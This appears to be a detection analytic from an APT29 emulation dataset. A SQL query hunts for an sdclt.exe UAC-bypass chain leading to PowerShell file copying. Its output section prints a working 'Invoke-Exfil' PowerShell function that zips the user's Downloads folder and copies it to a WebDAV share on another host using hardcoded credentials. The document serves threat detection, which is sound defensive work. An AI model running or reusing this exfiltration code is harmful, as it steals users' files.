# B19F8E16-AA6C-45C1-8A0D-92812830C237

## Data Sources
* Security<br>* Microsoft-Windows-PowerShell/Operational<br>

## Logic

```
SELECT f.ScriptBlockText
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
AND f.EventID = 4104
AND LOWER(f.ScriptBlockText) LIKE "%copy-item%"

```

## Output

```
function Invoke-Exfil {

  if (!(Get-Module -Name "7Zip4Powershell")) { Write-Host "[*] Installing 7Zip4Powershell module"; Install-Module -Name 7Zip4Powershell -Force }

  Write-Host "[*] Compressing all the things in download dir"
  Compress-7Zip -Path "$env:USERPROFILE\Downloads\" -Filter * -Password "lolol" -ArchiveFileName "$env:APPDATA\OfficeSupplies.7z"

  $UserName = "cozy"
  $Password = "MyCozyPassw0rd!" | ConvertTo-SecureString -AsPlainText -Force
  $Creds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $UserName, $Password

  $WebDavShare = "WebDavShare"
  $uri = "\\192.168.0.4\webdav"

  Remove-PSDrive $WebDavShare -Force -ErrorAction SilentlyContinue # Ensure another PSDrive is not occupying the name WebDavShare
  
  Write-Host "[*] Creating a temporary mapped network drive - WebDavShare"
  New-PSDrive -Name $WebDavShare -PSProvider FileSystem -Root $uri -Credential $Creds

  Write-Host "[*] Copying data to WebDavShare"
  Copy-Item "$env:APPDATA\OfficeSupplies.7z" "WebDavShare:\OfficeSupplies.7z" -Force

  Write-Host "[*] Removing temporary network share"
  Remove-PSDrive $WebDavShare -Force -ErrorAction SilentlyContinue

  Invoke-BeachCleanup
}

```
